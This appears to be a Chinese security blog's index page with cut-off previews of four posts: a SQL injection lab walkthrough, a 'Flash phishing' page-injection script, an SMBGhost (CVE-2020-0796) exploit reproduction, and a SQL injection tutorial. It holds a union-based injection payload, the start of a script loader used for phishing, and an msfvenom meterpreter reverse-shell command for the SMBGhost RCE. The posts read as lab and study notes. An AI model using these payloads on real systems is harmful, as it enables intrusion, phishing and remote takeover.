sql注入靶场全通关
第一关:
首先我们先判断闭合方式 我们用\来试探闭合方式
发现是单引号闭合,那我们接着就来判断 它的列数 group by 4 发现报错 group 3 发现不报错 说明它就是为3列
接着就是查库 查表 查字段 查内容了
查表
查字段
查内容
注意点:1.在查表的时候放了个错误:
1?id=0' union select 1,group_concat(table_name) from information_schema.tables where table_schema=database(),3--+
这样做是会爆错的 因为在select 后面接的是列名,后面接的from information_schema.tables where table_schema=database() 就相当于这一个查询的sql语句已经完结,但是我们后面还有一个第3列,这个3没有地方可待了 就会报错,所以我们得把这个from….放在最后才行
2.在我们查内容的时候为了区分用户名跟密码时,可以在中间加上,但是要注意的时在两边加上单引号
第二关:我们判断出这个题为没有 ...
Flash钓鱼
Flash钓鱼:我们先准备一个flash的js文件
123456789101112131415161718192021222324252627282930313233var s1 = document.createElement('script');s1.setAttribute('type','text/javascript');s1.setAttribute('src','//cdnjs.cloudflare.com/ajax/libs/jquery/2.0.0/jquery.min.js');var head = document.getElementsByTagName('head')[0];head.appendChild(s1);s1.onload = function(){ var s2 = document.createElement('script'); s2.setAttribute('type& ...
永恒之黑CVE-2020-0796
cve漏洞复现代码1234567891011121314151617181920212223242526272829303132333435363738POC(蓝屏)https://github.com/eerykitty/CVE-2020-0796-PoC使用pip install ntlm_auth ./CVE-2020-0796.py 192.168.30.134EXP(RCE)https://github.com/chompie1337/SMBGhost_RCE_PoCmsfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=kaliip LPORT=5556 -b '\x00' -i 5 -f python > exploit使用vimvim exploit 回车:%s/buf/USER_PAYLOAD 回车:wq! 回车将exploit内容替换到exploit.py参考 ...
sql注入的学习
sql注入的学习
首先先要判断注入类型
可以按照查询字段分类分为字符型 和 数字型
在get请求中区分这两种类型方法:
如果是字符型闭合,那就接着判断闭合方式
如果有报错文:可以在输入的参数下+\
例如这样:
我们可以十分清楚的看到\后面的为一个单引号,所以这个题目就为单引号闭合
为什么要知道闭合方式?
因为当我们知道闭合方式之后,我们可以将原先系统内置的sql语句进行闭合。根据mysql的语法,我们在后面在加入一条sql语句,这条我们加的sql语句也是会继续执行的,从而进行sql注入
1.union注入在前面步骤做完之后,我们需要判断它表中有多少列,要与之对应
因为在union联合查询的时候如果查询的两个列数不同的话,是查询不出结果的。
在我们判断完列数之后要进行显示位判断
因为显示的原因,它只显示第一个查询的内容,我们要看显示位,可以把id改成一个不存在的就行了
在这里我们可以看到显示位是2和3,所以我们可以用查询语句来替换2和3的位置,来显示我们要的查询结果
2.报错注入
有以下几种报错注入相关的函数:
我们通常是在我们union注入代码正确但是却没有回显的时候,这个时 ...